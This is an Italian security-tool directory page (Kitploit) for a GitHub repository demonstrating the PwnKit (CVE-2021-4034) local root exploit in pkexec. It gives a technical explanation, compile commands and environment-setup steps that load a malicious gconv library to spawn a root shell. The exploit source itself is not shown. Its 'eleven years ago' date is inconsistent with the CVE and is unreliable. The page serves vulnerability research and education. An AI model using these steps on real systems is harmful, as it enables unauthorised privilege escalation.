Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-4034-PwnKit- — Questo repository mostra come sfruttare la vulnerabilità CVE-2021-4034. | Kitploit
Strumenti/GitHubGitHub/igonzalez357/cve-2021-4034-pwnkit-
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubigonzalez357/cve-2021-4034-pwnkit-

CVE-2021-4034-PwnKit-

Questo repository mostra come sfruttare la vulnerabilità CVE-2021-4034.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

CVE-2021-4034 (PwnKit) - Analisi e Sfruttamento

Questo repository contiene il codice sorgente per dimostrare lo sfruttamento della vulnerabilità CVE-2021-4034, nota anche come PwnKit, scoperta in pkexec (parte del pacchetto Polkit). Questa falla consente un escalation locale dei privilegi a root tramite l'uso di variabili d'ambiente dannose.


⚠️ Attenzione

Questo codice è fornito esclusivamente a scopi educativi e di ricerca. Non deve essere utilizzato su sistemi in produzione né senza autorizzazione esplicita. L'uso improprio può essere illegale e viola i termini d'uso dell'autore.


🧠 Descrizione tecnica

La vulnerabilità si presenta quando pkexec viene eseguito senza argomenti, cioè argc == 0. In questo caso, pkexec tenta di accedere a argv[1] senza verificare che argv[0] esista, provocando la lettura da envp[0]. Ciò consente all'attaccante di:

  • Leggere e sovrascrivere variabili d'ambiente come GCONV_PATH.
  • Forzare il caricamento di una libreria .so arbitraria per eseguire codice come root.

L'exploit sfrutta questa condizione per caricare una libreria dannosa che apre una shell come utente root.


📁 File del repository

  • cve-2021-4034.c: Codice sorgente dell'exploit che invoca pkexec con argv[] = {NULL} e variabili d'ambiente modificate.
  • pwnkit.c: Codice sorgente della libreria dannosa che apre una shell come root.

🛠️ Compilazione

root@kitploit:~
gcc -Wall -o cve-2021-4034 cve-2021-4034.c
gcc -Wall -shared -fPIC -o pwnkit.so pwnkit.c

🧪 Istruzioni per l'uso (Preparazione dell'ambiente ed esecuzione)

root@kitploit:~
mkdir GCONV_PATH=.
echo 'module UTF-8// PWNKIT// pwnkit 1' > gconv-modules
cp $(which true) GCONV_PATH=./pwnkit.so:.

./cve-2021-4034
Scarica lo strumento